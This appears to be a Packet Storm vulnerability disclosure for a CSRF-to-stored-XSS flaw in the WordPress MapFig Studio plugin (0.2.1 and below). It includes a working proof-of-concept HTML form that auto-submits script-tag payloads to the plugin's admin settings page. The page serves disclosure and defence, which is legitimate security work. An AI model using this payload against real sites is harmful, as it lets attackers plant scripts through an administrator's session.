WordPress MapFig Studio 0.2.1 Cross Site Request Forgery / Cross Site Scripting ≈ Packet Storm

Home[1] Files[2] News[3] &[SERVICES_TAB] Contact[4] Add New[5]

WordPress MapFig Studio 0.2.1 Cross Site Request Forgery / Cross Site Scripting[6]
Authored by Vuln Seeker Cybersecurity Team[7]

WordPress MapFig Studio plugin versions 0.2.1 and below suffer from cross site request forgery and cross site scripting vulnerabilities.

SHA-256 | bb373228013ea4da17857eacb046e2ed58e688e52aab0abc39365db5b8ba412c

Change Mirror[11] Download[12]

        # Exploit Title: MapFig Studio <= 0.2.1 - Stored XSS via CSRF
# Date: 15-04-2024
# Exploit Author: Vuln Seeker Cybersecurity Team
# Vendor Homepage: https://wordpress.org/plugins/mapfig-studio/
# Version: <= 0.2.1
# Tested on: Firefox
# Contact me: Cette adresse e-mail est protégée contre les robots spammeurs. Vous devez activer le JavaScript pour la visualiser.
Description
The plugin does not have CSRF check in some places, and is missing
sanitisation as well as escaping, which could allow attackers to make
logged in admin add Stored XSS payloads via a CSRF attack
Proof of Concept
Have a logged in admin open a page containing:
<html>
<body>
<form action="http://example.com/wp-admin/admin.php?page=studio_settings"
method="POST">
<input type="hidden" name="studio_apikey"
value=""><script>alert(1)</script>" />
<input type="hidden" name="studio_url"
value=""><script>alert(1)</script>" />
<input type="hidden" name="save" value="Save!" />
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>
Reference:
https://wpscan.com/vulnerability/0346b62c-a856-4554-a24a-ef2c2943bda9/

Login[13] or Register[14] to add favorites

File Archive:

August 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa

File Tags

File Archives

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services[119]
Hosting By
Rokasec[120]
close
Image

Pensée du jour :

Ce que l'homme a fait ,

l'homme peut le défaire.

 

"No secure path in the world"